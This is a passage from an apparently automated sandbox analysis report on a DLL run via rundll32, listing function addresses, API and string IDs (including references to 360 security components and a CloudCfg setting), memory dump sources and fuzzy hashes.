                                                                                                  • Instruction Fuzzy Hash: 21B15B36704B848AE792CF61F48039EB7B5F748788F518015EE8917A98CF38D65DDB48
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180068020 Relevance: 10.7, APIs: 7, Instructions: 200COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??3@?terminate@@$ErrorExceptionLastThrowmemmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 223594506-0
                                                                                                  • Opcode ID: abe36e33305c97acef1d384f130b573a12daa0eb5c7ec11c20e9a8599c7bd32e
                                                                                                  • Instruction ID: fcc32ee8dbcfcc96106fa9aa2d9edb036d58ed735eb2ced8cd8263455d285739
                                                                                                  • Opcode Fuzzy Hash: abe36e33305c97acef1d384f130b573a12daa0eb5c7ec11c20e9a8599c7bd32e
                                                                                                  • Instruction Fuzzy Hash: 0971E472210B8882EB559F19E8403DE6321FB8DBD4F608611FBAD47B96DF38C699C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018000CB00 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 189COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Value_errno$HeapProcess_time64
                                                                                                  • String ID: %s_count$%s_lasttime$CloudCfg
                                                                                                  • API String ID: 2146318826-610660357
                                                                                                  • Opcode ID: 391d25aba3b16aa89747ead15b5123f6840dc9e57769fc6a8d330c04b0e76dac
                                                                                                  • Instruction ID: 0a7454a278269eadbb0ffce7cefadb2dc21e45630bc3a54506c3f9663c92b6cc
                                                                                                  • Opcode Fuzzy Hash: 391d25aba3b16aa89747ead15b5123f6840dc9e57769fc6a8d330c04b0e76dac
                                                                                                  • Instruction Fuzzy Hash: DC819572215B4986EB91DB64D4807DE77A0F7887E4F508226FA5E437E9DF38CA48CB40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018000E478 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$Stream$??3@CreateFromLockSizeUnlock
                                                                                                  • String ID: __Location__
                                                                                                  • API String ID: 3539542440-1240413640
                                                                                                  • Opcode ID: 258c331e991ad95c783ef0416d4c37d993b248583095014714736d7ddb22313c
                                                                                                  • Instruction ID: 0f7485e4f93bbca4fed8cf01455b67f1128db3508264a427a58b068d72c2ae23
                                                                                                  • Opcode Fuzzy Hash: 258c331e991ad95c783ef0416d4c37d993b248583095014714736d7ddb22313c
                                                                                                  • Instruction Fuzzy Hash: A6818072700A4885EB46DB75D8403DC3761F749BE8F548216EA2E577E5DF34CA89C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800416AC Relevance: 10.7, APIs: 7, Instructions: 186filetimeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$??3@memset$??2@CloseCreateHandleLocalReadSizeTimememmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 1580871609-0
                                                                                                  • Opcode ID: 1ea34bf717c188f261df4d55dace50faf815ae1420c68309131a6986235bd89a
                                                                                                  • Instruction ID: 9ee3987d771936754bf2ec95240b51fbfdf566f0c87b186fa2af0a924239acdb
                                                                                                  • Opcode Fuzzy Hash: 1ea34bf717c188f261df4d55dace50faf815ae1420c68309131a6986235bd89a
                                                                                                  • Instruction Fuzzy Hash: B981AA32A00B489AE795DF69D5803ED33B0F748BDDF008215EE1A17A95EF34D6A9C344
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180073620 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 175COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: tolower$__pctype_funclocaleconv
                                                                                                  • String ID: @$s
                                                                                                  • API String ID: 1428271734-3074397682
                                                                                                  • Opcode ID: 870097dd4b244917463ce528d91e901578feaee94ff52399b12698ab5ca81f40
                                                                                                  • Instruction ID: 6108c58a119eda9aeebc8c7cffb63edf03d10b724980f2cc7b0e25c2db6eeec6
                                                                                                  • Opcode Fuzzy Hash: 870097dd4b244917463ce528d91e901578feaee94ff52399b12698ab5ca81f40
                                                                                                  • Instruction Fuzzy Hash: 2381BFB2208B9886EBA68F29D0513ED7BA1E349BD4F14C116EB9957398DF3EC945C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180037560 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 147COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcschr
                                                                                                  • String ID:
                                                                                                  • API String ID: 1497570035-178107231
                                                                                                  • Opcode ID: 91aaae39f80d0418fd6fc02b66f74db7f1f6b55bc5cea72befadec07e3e486c7
                                                                                                  • Instruction ID: 551f47029daa90ee5f8560b06094b5e5181bcf51381db03c2015ed80f31b1854
                                                                                                  • Opcode Fuzzy Hash: 91aaae39f80d0418fd6fc02b66f74db7f1f6b55bc5cea72befadec07e3e486c7
                                                                                                  • Instruction Fuzzy Hash: B351E571306A5880FAB39B1A84253EA73A0A71DFE8F56C121EE5D077D2EF38C6498300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180008C68 Relevance: 10.6, APIs: 7, Instructions: 125COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CharNext
                                                                                                  • String ID:
                                                                                                  • API String ID: 3213498283-0
                                                                                                  • Opcode ID: f29f1362136db7183f5f3bb7661024df541b93d863d4b8e8a836a3b8ce17e584
                                                                                                  • Instruction ID: 1492bbbb0fb01b81f8d7bc8417cc5d1fdb32638e21ab672acd404a2c35c9a6c4
                                                                                                  • Opcode Fuzzy Hash: f29f1362136db7183f5f3bb7661024df541b93d863d4b8e8a836a3b8ce17e584
                                                                                                  • Instruction Fuzzy Hash: 5B417236615A9881FBA2CF11D4143A833E0FB5CBD4F44C412EB8A47795EF78C7AA9305
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018003168C Relevance: 10.6, APIs: 3, Strings: 4, Instructions: 120COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: <?XML$<CHANNEL$>$HREF
                                                                                                  • API String ID: 0-1028254503
                                                                                                  • Opcode ID: 87a41a6c4d0ae98e7d69096c7a3dafb46038613e02f69647dbd2907609dc09b6
                                                                                                  • Instruction ID: 67ff59abb7716e8502629db63671e64219ed1040f01711d1584acfb3c691788b
                                                                                                  • Opcode Fuzzy Hash: 87a41a6c4d0ae98e7d69096c7a3dafb46038613e02f69647dbd2907609dc09b6
                                                                                                  • Instruction Fuzzy Hash: AB412576205A4986EA93DF29D4407EA23A1F74CBF1F49C312FA69076E4EF38C659C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018000C97C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 111COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Value$_time64$HeapProcess
                                                                                                  • String ID: %s_count$%s_lasttime$CloudCfg
                                                                                                  • API String ID: 1319719158-610660357
                                                                                                  • Opcode ID: 633e9513b59cb82dbd4c42a8dfc42ca5507bcd6ec68c6f3b38eaf980b99686d7
                                                                                                  • Instruction ID: 831a43b99bf02356c207f364941f14581f3732c075b2ce428cfbfee20bf611f1
                                                                                                  • Opcode Fuzzy Hash: 633e9513b59cb82dbd4c42a8dfc42ca5507bcd6ec68c6f3b38eaf980b99686d7
                                                                                                  • Instruction Fuzzy Hash: 6D416CB2701B4486EB51DB29D84079D37A1FB89BF8F048325AA2E577E5DF38C688C341
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018005AAEC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$AppendCloseCreateHandleModuleNamePathReadSizememmove
                                                                                                  • String ID: ..\config\msgcenter64.dat
                                                                                                  • API String ID: 1552649294-925171115
                                                                                                  • Opcode ID: 2b6bc0a9826245997d2484599f869692e6608d281a15ca6de91b59abf58e858d
                                                                                                  • Instruction ID: 6037bf8a0cbc718679defd9cfc68d096276397db31603676c3dd85afabd3a34b
                                                                                                  • Opcode Fuzzy Hash: 2b6bc0a9826245997d2484599f869692e6608d281a15ca6de91b59abf58e858d
                                                                                                  • Instruction Fuzzy Hash: A1316032604B8886E751CF61E8447CDBBA4F389BD4F508115FEA917BA8CF38C64ACB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180056534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendFilememset$CloseExistsModuleName_wcsicmp
                                                                                                  • String ID: safemon\360EDRSensor.exe
                                                                                                  • API String ID: 2297386589-1382049097
                                                                                                  • Opcode ID: 42f0aba2aa1986b903558ee18fe79d01fe9ddf52126576828c9ac8a665b693b0
                                                                                                  • Instruction ID: b56041483c5d1cc8e669a9f5834781a952b0b95e5cd2a6710febed08a80e77bc
                                                                                                  • Opcode Fuzzy Hash: 42f0aba2aa1986b903558ee18fe79d01fe9ddf52126576828c9ac8a665b693b0
                                                                                                  • Instruction Fuzzy Hash: 44315071724A4886EA91DB24EC9439973A0FB8C7A4F409215B96E436F5EF39C74DC700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800562D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendFilememset$CloseExistsModuleName_wcsicmp
                                                                                                  • String ID: safemon\360ExtHost.exe
                                                                                                  • API String ID: 2297386589-1382862812
                                                                                                  • Opcode ID: fc9508a032b388f95354c21349e4f50a604572e192d3fc7bf2bb7d329c5c28e2
                                                                                                  • Instruction ID: 6ff1a21142ab4c8bd4a0b27ef24c26924cb25d1c518f26ee789ee6da218a3a52
                                                                                                  • Opcode Fuzzy Hash: fc9508a032b388f95354c21349e4f50a604572e192d3fc7bf2bb7d329c5c28e2
                                                                                                  • Instruction Fuzzy Hash: E7316F71724A4886EBA1DB24EC943997360FB8C7A4F409215B96E836F5DF39C74CCB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018000892C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63registrylibraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressCloseHandleModuleOpenProc
                                                                                                  • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                                                  • API String ID: 823179699-3913318428
                                                                                                  • Opcode ID: e5aa230e6d6d73d44fbb0867bef8b98e7cffe5e7cefdcdffa37db2e7ba59e934
                                                                                                  • Instruction ID: bf9e62a3942db8529e652a7a00b11324bbad2056b1e05bdd0101147039c14a4a
                                                                                                  • Opcode Fuzzy Hash: e5aa230e6d6d73d44fbb0867bef8b98e7cffe5e7cefdcdffa37db2e7ba59e934
                                                                                                  • Instruction Fuzzy Hash: E7218E32604B4482EB92DF02F8543A973A0FB8CBD0F088025AED947B54DF3CC659D701
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018004410C Relevance: 10.6, APIs: 7, Instructions: 58COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AcquireContextCriticalCryptSection_time64$EnterErrorLastLeavememsetrandsrand
                                                                                                  • String ID:
                                                                                                  • API String ID: 1109857607-0
                                                                                                  • Opcode ID: 8a34afe03370e941922b9fa1342c3f51188d8ab34ab1c1fde89d7cbfdbbd1467
                                                                                                  • Instruction ID: ca70be7a54b7a8b6e3e4f55ca6010b26a0c6ab118fec8c1b3c60b99ca43e49b7
                                                                                                  • Opcode Fuzzy Hash: 8a34afe03370e941922b9fa1342c3f51188d8ab34ab1c1fde89d7cbfdbbd1467
                                                                                                  • Instruction Fuzzy Hash: 7521A132B10B4482E7559F25E84439C77A5FB99F98F059225DA690BBA5CF38C68AC300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018004F468 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 57libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$AddressEnterHandleLeaveModuleProc
                                                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                                                                  • API String ID: 3003946417-3900151262
                                                                                                  • Opcode ID: 6f9c69537aee207e76f46cf012ddb25f35c479e924d9122b0865608856dfc553
                                                                                                  • Instruction ID: d8768edbf8454b7cfa73ea2a06319ccfd93a48644ed29c5473b77248e6d43ddc
                                                                                                  • Opcode Fuzzy Hash: 6f9c69537aee207e76f46cf012ddb25f35c479e924d9122b0865608856dfc553
                                                                                                  • Instruction Fuzzy Hash: 8D212C30605B0895EA929B24FD843E93360F74DBE9F559115E969073B1DF68C78EC304
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018005760C Relevance: 10.6, APIs: 7, Instructions: 55windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$ForegroundFromMonitor$Visible
                                                                                                  • String ID:
                                                                                                  • API String ID: 262661973-0
                                                                                                  • Opcode ID: 50d6c86a5c954526de36236bf2b34abfcf45b580831625f5d8fda67e30c87f8d
                                                                                                  • Instruction ID: 1a089d366b8620dc2648cd5d079bf33926917e3ecc8d752c4a23f5f376d80d5e
                                                                                                  • Opcode Fuzzy Hash: 50d6c86a5c954526de36236bf2b34abfcf45b580831625f5d8fda67e30c87f8d
                                                                                                  • Instruction Fuzzy Hash: DC118E35708A0881FAA18B15A9443A9A7E5F38CFC4F198024FE8E57B65DF3DC64A9780
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180084E36 Relevance: 10.6, APIs: 7, Instructions: 50memorysynchronizationCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
